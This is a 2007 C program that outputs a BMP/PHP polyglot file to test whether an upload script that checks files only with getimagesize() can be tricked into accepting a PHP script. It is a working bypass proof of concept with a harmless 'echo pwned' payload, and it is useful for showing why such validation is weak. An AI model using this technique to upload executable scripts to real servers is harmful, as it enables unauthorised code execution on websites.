/* ex: set ts=8 noet: */
/* Tue Sep 25 07:54:16 EDT 2007 */
/* Copyright 2007 Ryan "pizza" Flynn */
/* Generate a file that is both a valid BMP and a valid PHP script in an attempt to investigate:
 * 	< easypwn> hey guys, an upload script uses getimagesize() for file verification. Is there a way I can have a way around this to upload .php scripts or similar?
 * 	< easypwn> getimagesize() is maybe a bad idea to use anyways, atleast if thats the only verification? or should it be pretty secure?
 */
/* Thank you http://www.fortunecity.com/skyscraper/windows/364/bmpffrmt.html for the BITMAPFILEHEADER and BITMAPINFOHEADER structure info */

#include <stdio.h>
#include <stdint.h>
#include <string.h>

#pragma pack(push, 1)
struct BITMAPFILEHEADER {
	uint16_t bfType;
	uint32_t bfSize;
	uint16_t bfReserved1;
	uint16_t bfReserved2;
	uint32_t bfOffBits;
} hdr;
/*
 * The BITMAPFILEHEADER:
 * start 	size 	name 	stdvalue 	purpose
 * 1 	2 	bfType 	19778 	must always be set to 'BM' to declare that this is a .bmp-file.
 * 3 	4 	bfSize 	?? 	specifies the size of the file in bytes.
 * 7 	2 	bfReserved1 	0 	must always be set to zero.
 * 9 	2 	bfReserved2 	0 	must always be set to zero.
 * 11 	4 	bfOffBits 	1078 	specifies the offset from the beginning of the file to the bitmap data.
 */
#pragma pack(pop)

#pragma pack(push, 1)
struct BITMAPINFOHEADER {
	uint32_t biSize;
	uint32_t biWidth;
	uint32_t biHeight;
	uint16_t biPlanes;
	uint16_t biBitCount;
	uint32_t biCompression;
	uint32_t biSizeImage;
	uint32_t biXPelsPerMeter;
	uint32_t biYPelsPerMeter;
	uint32_t biClrUsed;
	uint32_t biClrImportant;
} nfo;
/*
 * The BITMAPINFOHEADER:
 * start 	size 	name 	stdvalue 	purpose
 * 15 	4 	biSize 	40 	specifies the size of the BITMAPINFOHEADER structure, in bytes.
 * 19 	4 	biWidth 	100 	specifies the width of the image, in pixels.
 * 23 	4 	biHeight 	100 	specifies the height of the image, in pixels.
 * 27 	2 	biPlanes 	1 	specifies the number of planes of the target device, must be set to zero.
 * 29 	2 	biBitCount 	8 	specifies the number of bits per pixel.
 * 31 	4 	biCompression 	0 	Specifies the type of compression, usually set to zero (no compression).
 * 35 	4 	biSizeImage 	0 	specifies the size of the image data, in bytes. If there is no compression, it is valid to set this member to zero.
 * 39 	4 	biXPelsPerMeter 	0 	specifies the the horizontal pixels per meter on the designated targer device, usually set to zero.
 * 43 	4 	biYPelsPerMeter 	0 	specifies the the vertical pixels per meter on the designated targer device, usually set to zero.
 * 47 	4 	biClrUsed 	0 	specifies the number of colors used in the bitmap, if set to zero the number of colors is calculated using the biBitCount member.
 * 51 	4 	biClrImportant 	0 	specifies the number of color that are 'important' for the bitmap, if set to zero, all colors are important.
 */
#pragma pack(pop)

const char *php = "<?php echo \"pwned\"; ?>";

main()
{
	hdr.bfType = 19778;
	hdr.bfSize = sizeof hdr + sizeof nfo + strlen(php);
	hdr.bfReserved1 = 0;
	hdr.bfReserved2 = 0;
	hdr.bfOffBits = 1078;

	nfo.biSize = 40;
	nfo.biWidth = hdr.bfSize;
	nfo.biHeight = 1;
	nfo.biPlanes = 1;
	nfo.biBitCount = 8;
	nfo.biCompression = 0;
	nfo.biSizeImage = 0;
	nfo.biXPelsPerMeter = 0;
	nfo.biYPelsPerMeter = 0;
	nfo.biClrUsed = 0;
	nfo.biClrImportant = 0;

	fwrite(&hdr, 1, sizeof hdr, stdout);
	fwrite(&nfo, 1, sizeof nfo, stdout);
	fwrite(php, 1, strlen(php), stdout);

	return 0;
}